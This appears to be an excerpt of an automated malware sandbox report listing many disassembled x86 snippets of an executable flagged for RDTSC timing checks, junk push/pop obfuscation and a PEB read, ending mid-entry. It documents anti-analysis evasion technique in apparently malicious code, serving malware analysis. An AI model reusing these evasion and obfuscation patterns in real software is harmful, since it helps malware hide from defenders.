Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 114B954 second address: 114B96F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FE80147AC03h 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FE80147ABFBh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 10BD109 second address: 10BD121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE801498582h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C298D second address: 12C2997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE80147ABF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C2D62 second address: 12C2D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C316F second address: 12C3190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE80147ABF6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FE80147ABF6h 0x00000018 popad 0x00000019 jg 00007FE80147ABFCh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C340C second address: 12C3412 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C3412 second address: 12C3418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C3418 second address: 12C3421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C3421 second address: 12C3427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C4FDF second address: 12C4FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE80149857Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 12C7AF5 second address: 12C7AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA004E second address: 6DA0054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0054 second address: 6DA0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0058 second address: 6DA00A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE801498586h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cl, 81h 0x00000013 mov eax, ebx 0x00000015 popad 0x00000016 jmp 00007FE801498585h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edi, 5343359Eh 0x00000026 movsx ebx, ax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00A3 second address: 6DA00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00C2 second address: 6DA00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE801498586h 0x0000000a popad 0x0000000b sub esp, 18h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE801498587h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00FA second address: 6DA00FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA00FF second address: 6DA016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE801498588h 0x00000013 xor cl, FFFFFF88h 0x00000016 jmp 00007FE80149857Bh 0x0000001b popfd 0x0000001c popad 0x0000001d movsx ebx, ax 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007FE801498588h 0x0000002d jmp 00007FE801498585h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA016F second address: 6DA0194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE80147ABFDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0194 second address: 6DA019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA019A second address: 6DA019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA019E second address: 6DA01A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA01A2 second address: 6DA020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007FE80147ABFFh 0x00000010 xchg eax, esi 0x00000011 jmp 00007FE80147AC06h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FE80147AC01h 0x0000001e xor al, 00000026h 0x00000021 jmp 00007FE80147AC01h 0x00000026 popfd 0x00000027 mov edx, eax 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov eax, edx 0x00000030 mov ebx, 68706186h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA032A second address: 6DA034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ch, 31h 0x00000007 popad 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE801498588h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA034D second address: 6DA0368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0368 second address: 6DA0383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0383 second address: 6DA039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA039B second address: 6DA039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA039F second address: 6DA03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE80147ABFDh 0x00000011 adc esi, 3B7CA8A6h 0x00000017 jmp 00007FE80147AC01h 0x0000001c popfd 0x0000001d mov di, ax 0x00000020 popad 0x00000021 pop edi 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA03DA second address: 6DA03DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA03DE second address: 6DA0431 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0892D0EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE80147ABFEh 0x00000010 and eax, 6C704978h 0x00000016 jmp 00007FE80147ABFBh 0x0000001b popfd 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 mov di, si 0x00000026 pushad 0x00000027 mov ecx, 438D1B9Fh 0x0000002c mov ax, D2BBh 0x00000030 popad 0x00000031 popad 0x00000032 mov dword ptr [esp], edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FE80147ABFDh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0431 second address: 6DA0464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE801498588h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0464 second address: 6DA0468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0468 second address: 6DA046E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA04E8 second address: 6DA04EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA04EE second address: 6DA04FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80149857Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA04FD second address: 6DA056D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE80147ABFBh 0x00000011 or si, D62Eh 0x00000016 jmp 00007FE80147AC09h 0x0000001b popfd 0x0000001c call 00007FE80147AC00h 0x00000021 call 00007FE80147AC02h 0x00000026 pop ecx 0x00000027 pop ebx 0x00000028 popad 0x00000029 je 00007FE86F4D9D46h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FE80147ABFDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA056D second address: 6DA0573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0573 second address: 6DA0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0577 second address: 6DA057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA057B second address: 6DA060E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d jmp 00007FE80147AC04h 0x00000012 mov dword ptr [esi], edi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE80147ABFEh 0x0000001b or si, BB98h 0x00000020 jmp 00007FE80147ABFBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FE80147AC08h 0x0000002c jmp 00007FE80147AC05h 0x00000031 popfd 0x00000032 popad 0x00000033 mov dword ptr [esi+04h], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE80147AC08h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA060E second address: 6DA0612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0612 second address: 6DA0618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0618 second address: 6DA0659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80149857Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FE801498580h 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE801498587h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0659 second address: 6DA0695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE80147AC08h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0695 second address: 6DA0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0699 second address: 6DA069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA069F second address: 6DA06A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06A5 second address: 6DA06A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06A9 second address: 6DA06AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06AD second address: 6DA06F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e pushfd 0x0000000f jmp 00007FE80147ABFEh 0x00000014 sub eax, 6B2A5438h 0x0000001a jmp 00007FE80147ABFBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007FE80147ABFBh 0x0000002c push esi 0x0000002d pop ebx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA06F1 second address: 6DA0705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE801498580h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0705 second address: 6DA0756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e mov dh, 68h 0x00000010 popad 0x00000011 mov eax, dword ptr [ebx+54h] 0x00000014 pushad 0x00000015 mov bx, cx 0x00000018 mov eax, 1A0FDA09h 0x0000001d popad 0x0000001e mov dword ptr [esi+18h], eax 0x00000021 jmp 00007FE80147AC04h 0x00000026 mov eax, dword ptr [ebx+58h] 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE80147AC07h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0756 second address: 6DA075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA075C second address: 6DA0760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0760 second address: 6DA0788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE801498589h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0788 second address: 6DA078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA078C second address: 6DA0792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0792 second address: 6DA07A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE80147AC03h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07A9 second address: 6DA07E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e jmp 00007FE80149857Eh 0x00000013 mov dword ptr [esi+20h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07E2 second address: 6DA07E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07E6 second address: 6DA07EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07EC second address: 6DA07F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA07F1 second address: 6DA0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, E9h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0803 second address: 6DA0809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0809 second address: 6DA083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE801498585h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA083E second address: 6DA0852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0852 second address: 6DA0856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0856 second address: 6DA086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147AC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA086D second address: 6DA0893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE801498589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0893 second address: 6DA08A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE80147ABFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA08A6 second address: 6DA0938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE80149857Fh 0x00000009 sub cl, 0000007Eh 0x0000000c jmp 00007FE801498589h 0x00000011 popfd 0x00000012 mov ecx, 43124CC7h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+68h] 0x0000001d jmp 00007FE80149857Ah 0x00000022 mov dword ptr [esi+2Ch], eax 0x00000025 jmp 00007FE801498580h 0x0000002a mov ax, word ptr [ebx+6Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FE80149857Eh 0x00000035 or ch, FFFFFFD8h 0x00000038 jmp 00007FE80149857Bh 0x0000003d popfd 0x0000003e mov dh, ah 0x00000040 popad 0x00000041 mov word ptr [esi+30h], ax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FE80149857Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0938 second address: 6DA0950 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5F5B01E4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+00000088h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0950 second address: 6DA0954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0954 second address: 6DA0958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0958 second address: 6DA095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA095E second address: 6DA0964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA0964 second address: 6DA097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE80149857Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1o81tDUu5M.exeRDTSC instruction interceptor: First address: 6DA097E second address: 6DA0A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE80147AC01h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FE80147AC01h 0x0000000f or ah, FFFFFFE6h 0x00000012 jmp 00007FE80147AC01h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebx+0000008Ch] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FE80147ABFCh 0x00000028 add al, FFFFFF88h 0x0000002b jmp 00007FE80147ABFBh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FE80147AC08h 0x00000037 jmp 00007FE80147AC05h 0x0000003c popfd 0x0000003d popad 0x0000003e mov dword ptr [esi+34h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 